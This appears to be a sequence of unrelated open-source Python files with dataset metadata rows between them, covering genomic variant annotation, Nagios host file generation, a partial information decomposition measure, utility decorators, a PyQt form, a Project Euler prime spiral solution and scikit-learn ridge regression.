for info in hit.info.split(";"):
if info.find("=") > 0:
# splits on first occurence of '='
# useful to handle valuerror: too many values to unpack (e.g (a,b) = split(",", (a,b,c,d)) for cases like
# SA=http://www.ncbi.nlm.nih.gov/sites/varvu?gene=4524&%3Brs=1801131|http://omim.org/entry/607093#0004
(key, value) = info.split("=", 1)
info_map[key] = value
# get the allele counts so that we can compute alternate allele frequencies
# example: EA_AC=2,6764;AA_AC=23,3785;TAC=25,10549
if info_map.get('EA_AC') is not None:
lines = info_map['EA_AC'].split(",")
aaf_EA = float(lines[0]) / (float(lines[0]) + float(lines[1]))
if info_map.get('AA_AC') is not None:
lines = info_map['AA_AC'].split(",")
aaf_AA = float(lines[0]) / (float(lines[0]) + float(lines[1]))
if info_map.get('TAC') is not None:
lines = info_map['TAC'].split(",")
aaf_ALL = float(lines[0]) / (float(lines[0]) + float(lines[1]))
# Is the SNP on an human exome chip?
if info_map.get('EXOME_CHIP') is not None and \
info_map['EXOME_CHIP'] == "no":
exome_chip = 0
elif info_map.get('EXOME_CHIP') is not None and \
info_map['EXOME_CHIP'] == "yes":
exome_chip = 1
return ESPInfo(found, aaf_EA, aaf_AA, aaf_ALL, exome_chip)
def get_1000G_info(var):
"""
Returns a suite of annotations from the 1000 Genomes project
"""
#fetched = []
info_map = {}
found = False
for hit in annotations_in_region(var, "1000g", "vcf", "grch37"):
# We need to ensure we are dealing with the exact sample variant
# based on position and the alleles present.
if var.start == hit.pos and \
var.ALT[0] == hit.alt and \
hit.ref == var.REF:
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=", 1)
info_map[key] = value
found = True
return ThousandGInfo(found, info_map.get('AF'), info_map.get('AMR_AF'),
info_map.get('ASN_AF'), info_map.get('AFR_AF'),
info_map.get('EUR_AF'))
def get_rmsk_info(var):
"""
Returns a comma-separated list of annotated repeats
that overlap a variant. Derived from the UCSC rmsk track
"""
rmsk_hits = []
for hit in annotations_in_region(var, "rmsk", "bed"):
rmsk_hits.append(hit.name)
return ",".join(rmsk_hits) if len(rmsk_hits) > 0 else None
def get_segdup_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a known segmental duplication.
"""
for hit in annotations_in_region(var, "segdup", "bed"):
return True
return False
def get_conservation_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a conserved region as defined
by the 29-way mammalian conservation study.
http://www.nature.com/nature/journal/v478/n7370/full/nature10530.html
Data file provenance:
http://www.broadinstitute.org/ftp/pub/assemblies/mammals/29mammals/ \
29way_pi_lods_elements_12mers.chr_specific.fdr_0.1_with_scores.txt.gz
# Script to convert for gemini:
gemini/annotation_provenance/make-29way-conservation.sh
"""
for hit in annotations_in_region(var, "conserved", "bed"):
return True
return False
def get_recomb_info(var):
"""
Returns the mean recombination rate at the site.
"""
count = 0
tot_rate = 0.0
for hit in annotations_in_region(var, "recomb", "bed"):
if hit.contig not in ['chrY']:
# recomb rate file is in bedgraph format.
# pysam will store the rate in the "name" field
count += 1
tot_rate += float(hit.name)
return float(tot_rate) / float(count) if count > 0 else None
def _get_first_vcf_hit(hit_iter):
if hit_iter is not None:
hits = list(hit_iter)
if len(hits) > 0:
return hits[0]
def _get_vcf_info_attrs(hit):
info_map = {}
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=", 1)
info_map[key] = value
return info_map
def get_gms(var):
"""Return Genome Mappability Scores for multiple technologies.
"""
techs = ["illumina", "solid", "iontorrent"]
GmsTechs = collections.namedtuple("GmsTechs", techs)
hit = _get_first_vcf_hit(
annotations_in_region(var, "gms", "vcf", "grch37"))
attr_map = _get_vcf_info_attrs(hit) if hit is not None else {}
return apply(GmsTechs,
[attr_map.get("GMS_{0}".format(x), None) for x in techs])
def get_grc(var):
"""Return GRC patched genome regions.
"""
regions = set()
for hit in annotations_in_region(var, "grc", "bed", "grch37"):
regions.add(hit.name)
return ",".join(sorted(list(regions))) if len(regions) > 0 else None
def get_cse(var):
"""Return if a variant is in a CSE: Context-specific error region.
"""
for hit in annotations_in_region(var, "cse", "bed", "grch37"):
return True
return False
def get_encode_tfbs(var):
"""
Returns a comma-separated list of transcription factors that were
observed to bind DNA in this region. Each hit in the list is constructed
as TF_CELLCOUNT, where:
TF is the transcription factor name
CELLCOUNT is the number of cells tested that had nonzero signals
NOTE: the annotation file is in BED format, but pysam doesn't
tolerate BED files with more than 12 fields, so we just use the base
tuple parser and grab the name column (4th column)
"""
tfbs = []
for hit in annotations_in_region(var, "encode_tfbs", "tuple"):
tfbs.append(hit[3] + "_" + hit[4])
if len(tfbs) > 0:
return ','.join(tfbs)
else:
return None
def get_encode_dnase_clusters(var):
"""
If a variant overlaps a DnaseI cluster, return the number of cell types
that were found to have DnaseI HS at in the given interval, as well
as a comma-separated list of each cell type:
Example data:
chr1 20042385 20042535 4 50.330600 8988t;K562;Osteobl;hTH1
chr1 20043060 20043210 3 12.450500 Gm12891;T47d;hESCT0
chr1 20043725 20043875 2 5.948180 Fibrobl;Fibrop
chr1 20044125 20044275 3 6.437350 HESC;Ips;hTH1
"""
for hit in annotations_in_region(var, "encode_dnase1", "tuple"):
return ENCODEDnaseIClusters(hit[3], hit[5])
return ENCODEDnaseIClusters(None, None)
def get_encode_consensus_segs(var):
"""
Queries a meta-BEDGRAPH of consensus ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
CTCF: CTCF-enriched element
E: Predicted enhancer
PF: Predicted promoter flanking region
R: Predicted repressed or low-activity region
TSS: Predicted promoter region including TSS
T: Predicted transcribed region
WE: Predicted weak enhancer or open chromatin cis-regulatory element
"""
for hit in annotations_in_region(var, "encode_consensus_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_encode_segway_segs(var):
"""
Queries a meta-BEDGRAPH of SegWay ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
"""
for hit in annotations_in_region(var, "encode_segway_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_encode_chromhmm_segs(var):
"""
Queries a meta-BEDGRAPH of SegWay ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
"""
for hit in annotations_in_region(var, "encode_chromhmm_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_resources( args ):
"""Retrieve list of annotation resources loaded into gemini.
"""
anno_files = get_anno_files( args )
return [(n, os.path.basename(anno_files[n])) for n in sorted(anno_files.keys())]
|
apache-2.0
| 5,353,853,671,318,104,000
| 37.726928
| 369
| 0.565338
| false
| 3.255713
| false
| false
| false
|
tarrow/librarybase-pwb
|
addpapers.py
|
1
|
1993
|
import queryCiteFile
import librarybase
import pywikibot
from epmclib.getPMCID import getPMCID
from epmclib.exceptions import IDNotResolvedException
import queue
import threading
import time
def rununthreaded():
citefile = queryCiteFile.CiteFile()
citations = citefile.findRowsWithIDType('pmc')
for idx, citation in enumerate(citations[10513:]):
addpaper(idx, citation)
def runthreaded():
threads = []
for i in range(10):
t = threading.Thread(target=worker())
t.start()
threads.append(t)
citefile = queryCiteFile.CiteFile()
citations = citefile.findRowsWithIDType('pmc')
for citation in enumerate(citations[10513:]):
q.put(citation)
q.join()
for i in range(10):
q.put(None)
for t in threads:
t.join()
def worker():
while True:
idx, citation = q.get()
addpaper( idx, citation )
q.task_done()
def addpaper( idx, citation ):
start=time.time()
print(citation)
if citation is None:
return
print('trying to add {} number {}'.format(citation[5], idx))
site = pywikibot.Site("librarybase", "librarybase")
item = librarybase.JournalArticlePage(site)
pmcidobj = getPMCID(citation[5])
try:
pmcidobj.getBBasicMetadata()
except IDNotResolvedException:
print('Couldn\'t find in EPMC:' + citation[5])
return
metadata = pmcidobj.metadata
print("Got metadata in:" + str(time.time()-start))
if not item.articleAlreadyExists(metadata['pmcid']):
print('Item doesn\'t seem to exist. Setting metadata for: ' + metadata['pmcid'])
item.setMetaData(metadata)
print("set metadata in" + str(time.time()-start))
else:
print("{} already exists. Doing nothing".format(metadata['pmcid']))
q=queue.Queue()
rununthreaded()
|
mit
| 4,137,417,748,321,423,400
| 27.776119
| 92
| 0.60562
| false
| 3.746241
| false
| false
| false
|
Autoplectic/dit
|
dit/pid/iwedge.py
|
1
|
1110
|
"""
The I_wedge measure, as proposed by Griffith et al.
"""
from __future__ import division
from .pid import BasePID
from .. import Distribution
from ..algorithms import insert_meet
from ..multivariate import coinformation
class PID_GK(BasePID):
"""
The Griffith et al partial information decomposition.
This PID is known to produce negative partial information values.
"""
_name = "I_GK"
@staticmethod
def _measure(d, inputs, output):
"""
Compute I_wedge(inputs : output) = I(meet(inputs) : output)
Parameters
----------
d : Distribution
The distribution to compute i_wedge for.
inputs : iterable of iterables
The input variables.
output : iterable
The output variable.
Returns
-------
iwedge : float
The value of I_wedge.
"""
d = d.coalesce(inputs+(output,))
d = Distribution(d.outcomes, d.pmf, sample_space=d.outcomes)
d = insert_meet(d, -1, d.rvs[:-1])
return coinformation(d, [d.rvs[-2], d.rvs[-1]])
|
bsd-3-clause
| 7,420,420,584,193,200,000
| 24.227273
| 69
| 0.587387
| false
| 3.922261
| false
| false
| false
|
CanuxCheng/Nagios-Auto
|
nrobot/host/host.py
|
1
|
9599
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
######################################################################
# Copyright C 2015 Faurecia (China) Holding Co.,Ltd. #
# All rights reserved #
# Name: host.py
# Author: Canux canuxcheng@163.com #
# Version: V1.0 #
# Time: Thu 20 Aug 2015 02:27:23 AM EDT
######################################################################
# Description:
######################################################################
from base import NagiosAuto
import os
class Host(NagiosAuto):
"""This class have three options to create create host file in nagios.
You can specify the template you need.
If you create a lots of host file at one time, this is more effeciency.
"""
def __init__(self, *args, **kwargs):
"""Define some variables"""
super(Host, self).__init__(*args, **kwargs)
self.g_dir = self.args.path + "/hosts/"
self.host_conf = self.conf + "/host/"
self.area_conf = self.conf + "/area/"
self.area_list = ["as", "us", "eu"]
if self.__class__.__name__ == "Host":
self.logger.debug("==== END DEBUG ====")
def define_options(self):
"""Define some options used for create host."""
super(Host, self).define_options()
self.parser.add_argument("-t", "--types",
action="append",
dest="types",
required=False,
help="The host types, eg: ['ad', 'mii', \
'ijcore', 'mii_win-primary', 'mii_win-bck']. \
Read template from types.cfg and \
read hostname and ip address from types.txt. \
Use types@mode for normal host. \
mode=0 use dns as address. \
mode=1 use ip as address.")
self.parser.add_argument("-v", "--vcenter",
dest="vcenter",
required=False,
help="Vcenter for mii and ijcore vmware.")
def get_area(self, hostname):
"""Get the area us/eu/as according to hostname."""
try:
locate = hostname[0:2].upper()
self.logger.debug("locate: {}".format(locate))
for area in self.area_list:
area_file = self.area_conf + area + ".txt"
self.logger.debug("area_file: {}".format(area_file))
f = open(area_file, "r")
lines = f.readlines()
for line in lines:
if locate in line:
self.logger.debug("area: {}".format(area))
return area
self.not_exist(locate)
except Exception as e:
self.error("get_area: %s" % e)
def get_vcenter(self, vcenter):
"""Get the vcenter for vmware."""
try:
vcenterfile = self.area_conf + "vmware.txt"
self.logger.debug("vcenterfile: {}".format(vcenterfile))
fr = open(vcenterfile, "r")
lines = fr.readlines()
for line in lines:
if vcenter in line:
vcenter = "".join(line.split())
self.logger.debug("vcenter: {}".format(vcenter))
return vcenter
self.not_exist("%s" % vcenter)
except Exception as e:
self.error("get_vcenter: %s" % e)
def get_mii_site(self, hostname):
"""Get the for _MII_SITEDATABASE in mii primary or backup server."""
try:
mii_site = hostname[2:5].upper()
self.logger.debug("mii_site: {}".format(mii_site))
return mii_site
except Exception as e:
self.error("get_mii_site: %s" % e)
def get_types(self, types):
try:
if types in ["ad", "mii_win-primary", "mii_win-bck"]:
types = types
mode = 1
elif types in ["mii", "ijcore"]:
types = types
mode = 0
else:
old_type = types
types = old_type.split("@")[0]
mode = old_type.split("@")[1]
if not mode:
self.error("Please specify address mode for normal host.")
self.logger.debug("types: {}".format(types))
self.logger.debug("mode: {}".format(mode))
return types, mode
except Exception as e:
self.error("get_types: %s" % e)
def write_one_host(self, hostfile, lines, vcenter,
area, mii_site, hostname, address):
"""Write to one host file."""
try:
fw = open(hostfile, "w")
for l in lines:
self.logger.debug("l: {}".format(l))
if "ohtpl_area_%s" in l:
fw.write(l % area)
elif "ohtpl_sys_vmware_%s_%s" in l:
l_vcenter = l.replace("ohtpl_sys_vmware_%s_%s",
str(vcenter))
fw.write(l_vcenter)
elif "host_name" in l:
fw.write(l % hostname)
elif "address" in l:
fw.write(l % address)
elif "_MII_SITEDATABASE" in l:
fw.write(l % mii_site)
elif "%s" not in l:
fw.write(l)
# If %s inside but not specify, can not handle it.
else:
self.error("write_host: unknow argument %s inside.")
except Exception as e:
self.error("write_one_host: %s" % e)
def create_host(self):
"""Get types from -t and read hostname and address and write to the \
hosts in nagios."""
try:
vcenter = ""
area = ""
mii_site = ""
for loop in range(0, len(self.args.types)):
types = self.args.types[loop]
self.logger.debug("types: {}".format(types))
(types, mode) = self.get_types(types)
# Get the template file.
template = self.host_conf + types + ".cfg"
self.logger.debug("template: {}".format(template))
ftr = open(template, "r")
lines = ftr.readlines()
# Get the hostname and address file.
host = self.host_conf + types + ".txt"
self.logger.debug("host: {}".format(host))
des_host = self.host_conf + types + ".tmp"
self.logger.debug("des_host: {}".format(des_host))
self.delete_blank_line(host, des_host)
fhr = open(des_host, "r")
h_lines = fhr.readlines()
for line in h_lines:
hostname = line.split()[0].split(".")[0].strip().upper()
self.logger.debug("hostname: {}".format(hostname))
address = line.split()[int(mode)].strip().lower()
self.logger.debug("address: {}".format(address))
hostfile = self.g_dir + hostname + ".cfg"
self.logger.debug("hostfile: {}".format(hostfile))
if types in ["ad"]:
area = self.get_area(hostname)
elif types in ["mii_win-primary", "mii_win-bck"]:
area = self.get_area(hostname)
mii_site = self.get_mii_site(hostname)
elif types in ["mii", "ijcore"]:
if self.args.vcenter:
vcenter = self.get_vcenter(self.args.vcenter)
else:
self.error("Please use -v to specify vcenter.")
# Write to the host in nagios.
if os.path.isfile(hostfile):
self.already_exist("%s" % hostfile)
if self.args.force:
self.write_one_host(hostfile, lines, vcenter, area,
mii_site, hostname, address)
else:
self.write_one_host(hostfile, lines, vcenter, area,
mii_site, hostname, address)
except Exception as e:
self.error("create_host: %s" % e)
def delete_host(self):
files = self.host_conf + "host.txt"
self.logger.debug("files: {}".format(files))
des_files = self.host_conf + "host.tmp"
self.logger.debug("des_files: {}".format(des_files))
self.delete_blank_line(files, des_files)
self.fr = open(des_files, "r")
self.lines = self.fr.readlines()
for line in self.lines:
self.logger.debug("line: {}".format(line))
hostname = line.split()[0].split(".")[0].strip().upper()
hostfile = self.g_dir + hostname + ".cfg"
self.logger.debug("hostfile: {}".format(hostfile))
if not os.path.isfile(hostfile):
self.not_exist("%s" % hostfile)
else:
try:
os.remove(hostfile)
except Exception as e:
self.error("remove_host: %s" % e)
|
bsd-3-clause
| -2,004,714,789,927,656,400
| 42.238739
| 79
| 0.449213
| false
| 4.331679
| false
| false
| false
|
radomd92/botjagwar
|
api/decorator.py
|
1
|
3279
|
import datetime
import multiprocessing
import threading
import time
def critical_section(cs_lock: threading.Lock):
"""
Decorator which uses acquires the specified lock when entering in the decorated function
and releases it once out of the decorated function.
:param cs_lock:
:return:
"""
def _critical_section(f):
def _critical_section_wrapper(*args, **kwargs):
cs_lock.acquire()
ret = f(*args, **kwargs)
cs_lock.release()
return ret
return _critical_section_wrapper
return _critical_section
class run_once(object):
"""
Decorator for run-once methods
"""
__slots__ = ("func", "result", "methods")
def __init__(self, func):
self.func = func
def __call__(self, *args, **kw):
try:
return self.result
except AttributeError:
self.result = self.func(*args, **kw)
return self.result
def __get__(self, instance, cls):
method = self.func.__get__(instance, cls)
try:
return self.methods[method]
except (AttributeError,KeyError):
decorated = run_once(method)
try:
self.methods[method] = decorated
except AttributeError:
self.methods = { method : decorated }
return decorated
def __eq__(self, other):
return isinstance(other, run_once) and other.func == self.func
def __hash__(self):
return hash(self.func)
def singleton(class_):
"""
Specify that a class is a singleton
:param class_:
:return:
"""
instances = {}
def getinstance(*args, **kwargs):
if class_ not in instances:
instances[class_] = class_(*args, **kwargs)
return instances[class_]
return getinstance
def threaded(f):
def wrap(*args, **kwargs):
t = threading.Thread(target=f, args=args, kwargs=kwargs)
t.daemon = False
t.start()
return wrap
def separate_process(f):
"""
Function runs in a separate, daemon thread
:param f:
:return:
"""
def wrap(*args, **kwargs):
t = multiprocessing.Process(target=f, args=args, kwargs=kwargs)
t.start()
return wrap
def time_this(identifier='function'):
def _time_this(f):
def wrapper(*args, **kwargs):
t0 = datetime.datetime.now()
ret = f(*args, **kwargs)
t1 = datetime.datetime.now()
dt = t1 - t0
d = dt.seconds * 1000 + dt.microseconds / 1000
print(("%s took %2.6f seconds to execute" % (identifier, d/1000.)))
return ret
return wrapper
return _time_this
def retry_on_fail(exceptions, retries=5, time_between_retries=1):
def _retry_on_fail(f):
def wrapper(*args, **kwargs):
m_retries = 0
try:
return f(*args, **kwargs)
except tuple(exceptions) as e:
if m_retries <= retries:
m_retries += 1
print('Error:', e, '%d' % m_retries)
time.sleep(time_between_retries)
else:
raise e
return wrapper
return _retry_on_fail
|
mit
| -8,227,460,502,292,809,000
| 24.818898
| 92
| 0.548033
| false
| 4.193095
| false
| false
| false
|
LegoStormtroopr/canard
|
SQBLWidgets/sqblUI/logicNodeText.py
|
1
|
3374
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui/logicNodeText.ui'
#
# Created: Sat Jul 25 12:16:46 2015
# by: PyQt4 UI code generator 4.9.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(534, 454)
self.verticalLayout = QtGui.QVBoxLayout(Form)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.label = QtGui.QLabel(Form)
self.label.setWordWrap(True)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout.addWidget(self.label)
self.targetRespondent = QtGui.QLineEdit(Form)
self.targetRespondent.setStyleSheet(_fromUtf8("margin-left:8px;"))
self.targetRespondent.setObjectName(_fromUtf8("targetRespondent"))
self.verticalLayout.addWidget(self.targetRespondent)
self.label_2 = QtGui.QLabel(Form)
self.label_2.setStyleSheet(_fromUtf8("margin-top:8px;"))
self.label_2.setWordWrap(True)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.verticalLayout.addWidget(self.label_2)
self.purpose = QtGui.QTextEdit(Form)
self.purpose.setStyleSheet(_fromUtf8("margin-left:8px;"))
self.purpose.setAcceptRichText(False)
self.purpose.setObjectName(_fromUtf8("purpose"))
self.verticalLayout.addWidget(self.purpose)
self.label_5 = QtGui.QLabel(Form)
self.label_5.setStyleSheet(_fromUtf8("margin-top:8px;"))
self.label_5.setWordWrap(True)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.verticalLayout.addWidget(self.label_5)
self.instruction = QtGui.QTextEdit(Form)
self.instruction.setStyleSheet(_fromUtf8("margin-left:8px;"))
self.instruction.setObjectName(_fromUtf8("instruction"))
self.verticalLayout.addWidget(self.instruction)
self.label_2.setBuddy(self.purpose)
self.label_5.setBuddy(self.instruction)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(QtGui.QApplication.translate("Form", "Form", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Form", "<html><head/><body><p><span style=\" font-weight:600;\">Target Respondent</span> - <span style=\" font-size:small;\">The people who this section is specifically trying to gather data from.</span></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("Form", "<html><head/><body><p><span style=\" font-weight:600;\">Purpose</span> - <small>Why are the people above identified and separated, and why are they being asked these questions.</small></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.label_5.setText(QtGui.QApplication.translate("Form", "<html><head/><body><p><span style=\" font-weight:600;\">Instruction</span> - <small>Extra text about this routing and sequencing that may be shown to a respondent depending on the final questionnaire.</small></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
|
gpl-3.0
| -7,360,708,022,024,144,000
| 54.311475
| 334
| 0.698281
| false
| 3.748889
| false
| false
| false
|
rodgzilla/project-euler
|
problem_058/problem.py
|
1
|
1801
|
def _try_composite(a, d, n, s):
if pow(a, d, n) == 1:
return False
for i in range(s):
if pow(a, 2**i * d, n) == n-1:
return False
return True # n is definitely composite
def is_prime(n, _precision_for_huge_n=16):
if n in _known_primes or n in (0, 1):
return True
if any((n % p) == 0 for p in _known_primes):
return False
d, s = n - 1, 0
while not d % 2:
d, s = d >> 1, s + 1
# Returns exact according to http://primes.utm.edu/prove/prove2_3.html
if n < 1373653:
return not any(_try_composite(a, d, n, s) for a in (2, 3))
if n < 25326001:
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5))
if n < 118670087467:
if n == 3215031751:
return False
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7))
if n < 2152302898747:
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11))
if n < 3474749660383:
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13))
if n < 341550071728321:
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13, 17))
# otherwise
return not any(_try_composite(a, d, n, s)
for a in _known_primes[:_precision_for_huge_n])
def primes_on_border(n):
new_numbers = [(2 * n + 1) ** 2 - 2 * n,
(2 * n + 1) ** 2 - 4 * n,
(2 * n + 1) ** 2 - 6 * n]
return len([num for num in new_numbers if is_prime(num)])
_known_primes = [2, 3]
_known_primes += [x for x in range(5, 1000, 2) if is_prime(x)]
total = 1
primes = 0
ratio = 1
i = 1
while ratio > 0.1:
total += 4
primes += primes_on_border(i)
ratio = primes / total
i += 1
print(2 * (i - 1) + 1)
|
gpl-3.0
| -2,561,185,032,495,983,000
| 32.351852
| 84
| 0.514159
| false
| 2.712349
| false
| false
| false
|
cdegroc/scikit-learn
|
sklearn/linear_model/ridge.py
|
1
|
19134
|
"""
Ridge regression
"""
# Author: Mathieu Blondel <mathieu@mblondel.org>
# License: Simplified BSD
import numpy as np
from .base import LinearModel
from ..utils.extmath import safe_sparse_dot
from ..utils import safe_asarray
from ..preprocessing import LabelBinarizer
from ..grid_search import GridSearchCV
def _solve(A, b, solver, tol):
# helper method for ridge_regression, A is symmetric positive
if solver == 'auto':
if hasattr(A, 'todense'):
solver = 'sparse_cg'
else:
solver = 'dense_cholesky'
if solver == 'sparse_cg':
if b.ndim < 2:
from scipy.sparse import linalg as sp_linalg
sol, error = sp_linalg.cg(A, b, tol=tol)
if error:
raise ValueError("Failed with error code %d" % error)
return sol
else:
# sparse_cg cannot handle a 2-d b.
sol = []
for j in range(b.shape[1]):
sol.append(_solve(A, b[:, j], solver="sparse_cg", tol=tol))
return np.array(sol).T
elif solver == 'dense_cholesky':
from scipy import linalg
if hasattr(A, 'todense'):
A = A.todense()
return linalg.solve(A, b, sym_pos=True, overwrite_a=True)
else:
raise NotImplementedError('Solver %s not implemented' % solver)
def ridge_regression(X, y, alpha, sample_weight=1.0, solver='auto', tol=1e-3):
"""Solve the ridge equation by the method of normal equations.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_responses]
Target values
sample_weight : float or numpy array of shape [n_samples]
Individual weights for each sample
solver : {'auto', 'dense_cholesky', 'sparse_cg'}, optional
Solver to use in the computational routines. 'delse_cholesky'
will use the standard scipy.linalg.solve function, 'sparse_cg'
will use the a conjugate gradient solver as found in
scipy.sparse.linalg.cg while 'auto' will chose the most
appropiate depending on the matrix X.
tol: float
Precision of the solution.
Returns
-------
coef: array, shape = [n_features] or [n_responses, n_features]
Weight vector(s).
Notes
-----
This function won't compute the intercept.
"""
n_samples, n_features = X.shape
is_sparse = False
if hasattr(X, 'todense'): # lazy import of scipy.sparse
from scipy import sparse
is_sparse = sparse.issparse(X)
if is_sparse:
if n_features > n_samples or \
isinstance(sample_weight, np.ndarray) or \
sample_weight != 1.0:
I = sparse.lil_matrix((n_samples, n_samples))
I.setdiag(np.ones(n_samples) * alpha * sample_weight)
c = _solve(X * X.T + I, y, solver, tol)
coef = X.T * c
else:
I = sparse.lil_matrix((n_features, n_features))
I.setdiag(np.ones(n_features) * alpha)
coef = _solve(X.T * X + I, X.T * y, solver, tol)
else:
if n_features > n_samples or \
isinstance(sample_weight, np.ndarray) or \
sample_weight != 1.0:
# kernel ridge
# w = X.T * inv(X X^t + alpha*Id) y
A = np.dot(X, X.T)
A.flat[::n_samples + 1] += alpha * sample_weight
coef = np.dot(X.T, _solve(A, y, solver, tol))
else:
# ridge
# w = inv(X^t X + alpha*Id) * X.T y
A = np.dot(X.T, X)
A.flat[::n_features + 1] += alpha
coef = _solve(A, np.dot(X.T, y), solver, tol)
return coef.T
class Ridge(LinearModel):
"""Linear least squares with l2 regularization.
This model solves a regression model where the loss function is
the linear least squares function and regularization is given by
the l2-norm. Also known as Ridge Regression or Tikhonov regularization.
This estimator has built-in support for multi-variate regression
(i.e., when y is a 2d-array of shape [n_samples, n_responses]).
Parameters
----------
alpha : float
Small positive values of alpha improve the conditioning of the
problem and reduce the variance of the estimates.
Alpha corresponds to (2*C)^-1 in other linear models such as
LogisticRegression or LinearSVC.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If True, the regressors X are normalized
copy_X : boolean, optional, default True
If True, X will be copied; else, it may be overwritten.
tol: float
Precision of the solution.
Attributes
----------
`coef_` : array, shape = [n_features] or [n_responses, n_features]
Weight vector(s).
See also
--------
RidgeClassifier, RidgeCV
Examples
--------
>>> from sklearn.linear_model import Ridge
>>> import numpy as np
>>> n_samples, n_features = 10, 5
>>> np.random.seed(0)
>>> y = np.random.randn(n_samples)
>>> X = np.random.randn(n_samples, n_features)
>>> clf = Ridge(alpha=1.0)
>>> clf.fit(X, y) # doctest: +NORMALIZE_WHITESPACE
Ridge(alpha=1.0, copy_X=True, fit_intercept=True, normalize=False,
tol=0.001)
"""
def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
copy_X=True, tol=1e-3):
self.alpha = alpha
self.fit_intercept = fit_intercept
self.normalize = normalize
self.copy_X = copy_X
self.tol = tol
def fit(self, X, y, sample_weight=1.0, solver='auto'):
"""Fit Ridge regression model
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_responses]
Target values
sample_weight : float or numpy array of shape [n_samples]
Individual weights for each sample
solver : {'auto', 'dense_cholesky', 'sparse_cg'}
Solver to use in the computational
routines. 'delse_cholesky' will use the standard
scipy.linalg.solve function, 'sparse_cg' will use the a
conjugate gradient solver as found in
scipy.sparse.linalg.cg while 'auto' will chose the most
appropiate depending on the matrix X.
Returns
-------
self : returns an instance of self.
"""
X = safe_asarray(X, dtype=np.float)
y = np.asarray(y, dtype=np.float)
X, y, X_mean, y_mean, X_std = \
self._center_data(X, y, self.fit_intercept,
self.normalize, self.copy_X)
self.coef_ = ridge_regression(X, y, self.alpha, sample_weight,
solver, self.tol)
self._set_intercept(X_mean, y_mean, X_std)
return self
class RidgeClassifier(Ridge):
"""Classifier using Ridge regression.
Parameters
----------
alpha : float
Small positive values of alpha improve the conditioning of the
problem and reduce the variance of the estimates.
Alpha corresponds to (2*C)^-1 in other linear models such as
LogisticRegression or LinearSVC.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If True, the regressors X are normalized
copy_X : boolean, optional, default True
If True, X will be copied; else, it may be overwritten.
tol: float
Precision of the solution.
Attributes
----------
`coef_` : array, shape = [n_features] or [n_classes, n_features]
Weight vector(s).
See also
--------
Ridge, RidgeClassifierCV
Notes
-----
For multi-class classification, n_class classifiers are trained in
a one-versus-all approach. Concretely, this is implemented by taking
advantage of the multi-variate response support in Ridge.
"""
def fit(self, X, y, solver='auto'):
"""Fit Ridge regression model.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples,n_features]
Training data
y : array-like, shape = [n_samples]
Target values
solver : {'auto', 'dense_cholesky', 'sparse_cg'}
Solver to use in the computational
routines. 'delse_cholesky' will use the standard
scipy.linalg.solve function, 'sparse_cg' will use the a
conjugate gradient solver as found in
scipy.sparse.linalg.cg while 'auto' will chose the most
appropiate depending on the matrix X.
Returns
-------
self : returns an instance of self.
"""
self.label_binarizer = LabelBinarizer()
Y = self.label_binarizer.fit_transform(y)
Ridge.fit(self, X, Y, solver=solver)
return self
def decision_function(self, X):
return Ridge.decision_function(self, X)
def predict(self, X):
"""Predict target values according to the fitted model.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
y : array, shape = [n_samples]
"""
Y = self.decision_function(X)
return self.label_binarizer.inverse_transform(Y)
class _RidgeGCV(LinearModel):
"""Ridge regression with built-in Generalized Cross-Validation
It allows efficient Leave-One-Out cross-validation.
